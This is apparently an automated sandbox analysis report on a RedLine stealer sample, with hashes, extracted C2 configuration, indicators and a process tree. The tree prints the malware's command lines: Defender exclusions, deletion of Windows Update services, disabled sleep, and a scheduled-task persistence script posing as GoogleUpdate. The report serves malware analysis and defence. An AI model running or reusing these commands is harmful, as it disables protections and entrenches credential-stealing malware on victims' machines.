Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
261s -
max time network
299s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system -
submitted
01/11/2022, 09:09
Static task
static1
Behavioral task
behavioral1
Sample
409cd2191cd5207704f590ca05b3ecd94bfe086f09c4aa87422e4126f04cab14.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
409cd2191cd5207704f590ca05b3ecd94bfe086f09c4aa87422e4126f04cab14.exe
Resource
win10-20220812-en
General
-
Target
409cd2191cd5207704f590ca05b3ecd94bfe086f09c4aa87422e4126f04cab14.exe
-
Size
2.4MB
-
MD5
c1fe936433eb4be74eef3e7095f42d77
-
SHA1
b997230735a2a033647425441f908cb906047523
-
SHA256
409cd2191cd5207704f590ca05b3ecd94bfe086f09c4aa87422e4126f04cab14
-
SHA512
e33c1fec65c97cd2c5dabeb460ef83e2102201d9d9cf1c2789b7dfa65e2bb6063b927612a7bfc7eff234fc70ee14802af4fe134b8abeb00c4f6fea2adda8e7a6
-
SSDEEP
24576:cBqYYgYPXQh8RMpJRh9dM46/uN9X5koyLSAOtSL2SxgCl3RuQ55313V:cBmsIoyLSAOtSll3T
Malware Config
Extracted
redline
@mnogokupurbolshoykarman
77.73.134.24:80
-
auth_value
b555cfd27c33c447be45d0969d5f35d8
Signatures
-
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
resource yara_rule behavioral2/memory/4476-131-0x0000000000422212-mapping.dmp family_redline behavioral2/memory/4476-126-0x0000000000400000-0x0000000000428000-memory.dmp family_redline -
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
description pid Process procid_target PID 4856 created 584 4856 powershell.EXE 3 PID 2660 created 2240 2660 svchost.exe 20 PID 2660 created 3636 2660 svchost.exe 23 PID 2896 created 584 2896 powershell.EXE 3 -
Downloads MZ/PE file
-
Executes dropped EXE 10 IoCs
pid Process 3616 brave.exe 4860 chrome.exe 4464 ofg.exe 5088 conhost.exe 96 GoogleUpdate.exe 4836 updater.exe 2752 svcupdater.exe 3816 svcupdater.exe 5668 svcupdater.exe 7756 svcupdater.exe -
Modifies Windows Firewall 1 TTPs 3 IoCs
pid Process 492 netsh.exe 1620 netsh.exe 648 netsh.exe -
Stops running service(s) 3 TTPs
-
resource yara_rule behavioral2/files/0x000800000001ac31-717.dat upx behavioral2/files/0x000800000001ac31-728.dat upx behavioral2/memory/4860-758-0x0000000000B90000-0x000000000142E000-memory.dmp upx behavioral2/memory/4860-972-0x0000000000B90000-0x000000000142E000-memory.dmp upx -
resource yara_rule behavioral2/memory/96-1090-0x0000000003750000-0x000000000400F000-memory.dmp vmprotect behavioral2/memory/96-1448-0x0000000003750000-0x000000000400F000-memory.dmp vmprotect -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 7 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 7 IoCs
description pid Process procid_target PID 3668 set thread context of 4476 3668 409cd2191cd5207704f590ca05b3ecd94bfe086f09c4aa87422e4126f04cab14.exe 67 PID 4860 set thread context of 96 4860 chrome.exe 84 PID 3616 set thread context of 4288 3616 brave.exe 117 PID 4856 set thread context of 4404 4856 powershell.EXE 124 PID 2896 set thread context of 5052 2896 powershell.EXE 130 PID 4836 set thread context of 864 4836 updater.exe 156 PID 4836 set thread context of 2404 4836 updater.exe 157 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe brave.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Drops file in Windows directory 5 IoCs
description ioc Process File opened for modification C:\Windows\Tasks\dialersvc64.job dialer.exe File created C:\Windows\GoogleUpdate.exe chrome.exe File created C:\Windows\Tasks\dialersvc32.job dialer.exe File opened for modification C:\Windows\Tasks\dialersvc32.job dialer.exe File created C:\Windows\Tasks\dialersvc64.job dialer.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4664 sc.exe 4904 sc.exe 1144 sc.exe 4960 sc.exe 1124 sc.exe 4580 sc.exe 4832 sc.exe 4832 sc.exe 2148 sc.exe 3152 sc.exe -
Program crash 2 IoCs
pid pid_target Process procid_target 3328 2240 WerFault.exe 20 4896 3636 WerFault.exe 23 -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4652 schtasks.exe 4508 SCHTASKS.exe 2808 schtasks.exe 300 SCHTASKS.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={2AE3B6FE-EF01-4BB2-9F12-7789B63F90C4}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4476 AppLaunch.exe 4476 AppLaunch.exe 4708 powershell.exe 4708 powershell.exe 4708 powershell.exe 96 GoogleUpdate.exe 96 GoogleUpdate.exe 5064 powershell.exe 5064 powershell.exe 5064 powershell.exe 3328 WerFault.exe 3328 WerFault.exe 3328 WerFault.exe 5100 powershell.exe 5100 powershell.exe 5100 powershell.exe 4856 powershell.EXE 2896 powershell.EXE 4856 powershell.EXE 2896 powershell.EXE 4856 powershell.EXE 2896 powershell.EXE 4856 powershell.EXE 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe 4404 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3048 Explorer.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 628 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4476 AppLaunch.exe Token: SeDebugPrivilege 4464 ofg.exe Token: SeDebugPrivilege 5088 conhost.exe Token: SeDebugPrivilege 4708 powershell.exe Token: SeDebugPrivilege 5064 powershell.exe Token: SeIncreaseQuotaPrivilege 5064 powershell.exe Token: SeSecurityPrivilege 5064 powershell.exe Token: SeTakeOwnershipPrivilege 5064 powershell.exe Token: SeLoadDriverPrivilege 5064 powershell.exe Token: SeSystemProfilePrivilege 5064 powershell.exe Token: SeSystemtimePrivilege 5064 powershell.exe Token: SeProfSingleProcessPrivilege 5064 powershell.exe Token: SeIncBasePriorityPrivilege 5064 powershell.exe Token: SeCreatePagefilePrivilege 5064 powershell.exe Token: SeBackupPrivilege 5064 powershell.exe Token: SeRestorePrivilege 5064 powershell.exe Token: SeShutdownPrivilege 5064 powershell.exe Token: SeDebugPrivilege 5064 powershell.exe Token: SeSystemEnvironmentPrivilege 5064 powershell.exe Token: SeRemoteShutdownPrivilege 5064 powershell.exe Token: SeUndockPrivilege 5064 powershell.exe Token: SeManageVolumePrivilege 5064 powershell.exe Token: 33 5064 powershell.exe Token: 34 5064 powershell.exe Token: 35 5064 powershell.exe Token: 36 5064 powershell.exe Token: SeDebugPrivilege 3328 WerFault.exe Token: SeShutdownPrivilege 2840 powercfg.exe Token: SeCreatePagefilePrivilege 2840 powercfg.exe Token: SeShutdownPrivilege 60 powercfg.exe Token: SeCreatePagefilePrivilege 60 powercfg.exe Token: SeShutdownPrivilege 3632 powercfg.exe Token: SeCreatePagefilePrivilege 3632 powercfg.exe Token: SeShutdownPrivilege 4008 powercfg.exe Token: SeCreatePagefilePrivilege 4008 powercfg.exe Token: SeIncreaseQuotaPrivilege 3328 WerFault.exe Token: SeSecurityPrivilege 3328 WerFault.exe Token: SeTakeOwnershipPrivilege 3328 WerFault.exe Token: SeLoadDriverPrivilege 3328 WerFault.exe Token: SeSystemProfilePrivilege 3328 WerFault.exe Token: SeSystemtimePrivilege 3328 WerFault.exe Token: SeProfSingleProcessPrivilege 3328 WerFault.exe Token: SeIncBasePriorityPrivilege 3328 WerFault.exe Token: SeCreatePagefilePrivilege 3328 WerFault.exe Token: SeBackupPrivilege 3328 WerFault.exe Token: SeRestorePrivilege 3328 WerFault.exe Token: SeShutdownPrivilege 3328 WerFault.exe Token: SeDebugPrivilege 3328 WerFault.exe Token: SeSystemEnvironmentPrivilege 3328 WerFault.exe Token: SeRemoteShutdownPrivilege 3328 WerFault.exe Token: SeUndockPrivilege 3328 WerFault.exe Token: SeManageVolumePrivilege 3328 WerFault.exe Token: 33 3328 WerFault.exe Token: 34 3328 WerFault.exe Token: 35 3328 WerFault.exe Token: 36 3328 WerFault.exe Token: SeIncreaseQuotaPrivilege 3328 WerFault.exe Token: SeSecurityPrivilege 3328 WerFault.exe Token: SeTakeOwnershipPrivilege 3328 WerFault.exe Token: SeLoadDriverPrivilege 3328 WerFault.exe Token: SeSystemProfilePrivilege 3328 WerFault.exe Token: SeSystemtimePrivilege 3328 WerFault.exe Token: SeProfSingleProcessPrivilege 3328 WerFault.exe Token: SeIncBasePriorityPrivilege 3328 WerFault.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 988 dwm.exe 988 dwm.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3668 wrote to memory of 4476 3668 409cd2191cd5207704f590ca05b3ecd94bfe086f09c4aa87422e4126f04cab14.exe 67 PID 3668 wrote to memory of 4476 3668 409cd2191cd5207704f590ca05b3ecd94bfe086f09c4aa87422e4126f04cab14.exe 67 PID 3668 wrote to memory of 4476 3668 409cd2191cd5207704f590ca05b3ecd94bfe086f09c4aa87422e4126f04cab14.exe 67 PID 3668 wrote to memory of 4476 3668 409cd2191cd5207704f590ca05b3ecd94bfe086f09c4aa87422e4126f04cab14.exe 67 PID 3668 wrote to memory of 4476 3668 409cd2191cd5207704f590ca05b3ecd94bfe086f09c4aa87422e4126f04cab14.exe 67 PID 4476 wrote to memory of 3616 4476 AppLaunch.exe 69 PID 4476 wrote to memory of 3616 4476 AppLaunch.exe 69 PID 4476 wrote to memory of 4860 4476 AppLaunch.exe 70 PID 4476 wrote to memory of 4860 4476 AppLaunch.exe 70 PID 4476 wrote to memory of 4860 4476 AppLaunch.exe 70 PID 4476 wrote to memory of 4464 4476 AppLaunch.exe 71 PID 4476 wrote to memory of 4464 4476 AppLaunch.exe 71 PID 4464 wrote to memory of 4672 4464 ofg.exe 92 PID 4464 wrote to memory of 4672 4464 ofg.exe 92 PID 4476 wrote to memory of 5088 4476 AppLaunch.exe 74 PID 4476 wrote to memory of 5088 4476 AppLaunch.exe 74 PID 5088 wrote to memory of 4944 5088 conhost.exe 75 PID 5088 wrote to memory of 4944 5088 conhost.exe 75 PID 4672 wrote to memory of 4652 4672 Conhost.exe 77 PID 4672 wrote to memory of 4652 4672 Conhost.exe 77 PID 4944 wrote to memory of 2808 4944 cmd.exe 80 PID 4944 wrote to memory of 2808 4944 cmd.exe 80 PID 4860 wrote to memory of 4708 4860 chrome.exe 79 PID 4860 wrote to memory of 4708 4860 chrome.exe 79 PID 4860 wrote to memory of 4708 4860 chrome.exe 79 PID 4860 wrote to memory of 4508 4860 chrome.exe 78 PID 4860 wrote to memory of 4508 4860 chrome.exe 78 PID 4860 wrote to memory of 4508 4860 chrome.exe 78 PID 4860 wrote to memory of 300 4860 chrome.exe 83 PID 4860 wrote to memory of 300 4860 chrome.exe 83 PID 4860 wrote to memory of 300 4860 chrome.exe 83 PID 4860 wrote to memory of 96 4860 chrome.exe 84 PID 4860 wrote to memory of 96 4860 chrome.exe 84 PID 4860 wrote to memory of 96 4860 chrome.exe 84 PID 4860 wrote to memory of 96 4860 chrome.exe 84 PID 4860 wrote to memory of 96 4860 chrome.exe 84 PID 4860 wrote to memory of 96 4860 chrome.exe 84 PID 4860 wrote to memory of 96 4860 chrome.exe 84 PID 4860 wrote to memory of 96 4860 chrome.exe 84 PID 4860 wrote to memory of 96 4860 chrome.exe 84 PID 3616 wrote to memory of 5064 3616 brave.exe 87 PID 3616 wrote to memory of 5064 3616 brave.exe 87 PID 96 wrote to memory of 648 96 GoogleUpdate.exe 93 PID 96 wrote to memory of 648 96 GoogleUpdate.exe 93 PID 96 wrote to memory of 648 96 GoogleUpdate.exe 93 PID 96 wrote to memory of 492 96 GoogleUpdate.exe 88 PID 96 wrote to memory of 492 96 GoogleUpdate.exe 88 PID 96 wrote to memory of 492 96 GoogleUpdate.exe 88 PID 96 wrote to memory of 1620 96 GoogleUpdate.exe 89 PID 96 wrote to memory of 1620 96 GoogleUpdate.exe 89 PID 96 wrote to memory of 1620 96 GoogleUpdate.exe 89 PID 3616 wrote to memory of 824 3616 brave.exe 95 PID 3616 wrote to memory of 824 3616 brave.exe 95 PID 3616 wrote to memory of 3340 3616 brave.exe 96 PID 3616 wrote to memory of 3340 3616 brave.exe 96 PID 3616 wrote to memory of 3328 3616 brave.exe 126 PID 3616 wrote to memory of 3328 3616 brave.exe 126 PID 3340 wrote to memory of 2840 3340 cmd.exe 101 PID 3340 wrote to memory of 2840 3340 cmd.exe 101 PID 824 wrote to memory of 2148 824 cmd.exe 104 PID 824 wrote to memory of 2148 824 cmd.exe 104 PID 3340 wrote to memory of 60 3340 cmd.exe 103 PID 3340 wrote to memory of 60 3340 cmd.exe 103 PID 824 wrote to memory of 4832 824 cmd.exe 144
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:636
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:584
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of FindShellTrayWindow
PID:988
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a50cddda-4fa9-420e-8041-c56dd5cee3a7}2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4404
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{320035ed-0e86-4d9d-bd7a-63aad3124fb0}2⤵PID:5052
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵PID:720
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵PID:904
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵PID:2616
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵PID:3188
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵PID:4996
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵PID:3592
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2240
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2240 -s 7842⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3328
-
-
C:\Users\Admin\AppData\Local\Temp\409cd2191cd5207704f590ca05b3ecd94bfe086f09c4aa87422e4126f04cab14.exe"C:\Users\Admin\AppData\Local\Temp\409cd2191cd5207704f590ca05b3ecd94bfe086f09c4aa87422e4126f04cab14.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4476 -
C:\Users\Admin\AppData\Local\Microsoft\brave.exe"C:\Users\Admin\AppData\Local\Microsoft\brave.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3616 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5064
-
-
C:\Windows\SYSTEM32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
- Suspicious use of WriteProcessMemory
PID:824 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
PID:4832
-
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
PID:2148
-
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
PID:4904
-
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
PID:1144
-
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
PID:3152
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f5⤵PID:288
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f5⤵PID:4796
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f5⤵PID:2664
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f5⤵
- Modifies security service
PID:2232
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f5⤵PID:2488
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
- Suspicious use of WriteProcessMemory
PID:3340 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:60
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:3632
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:4008
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 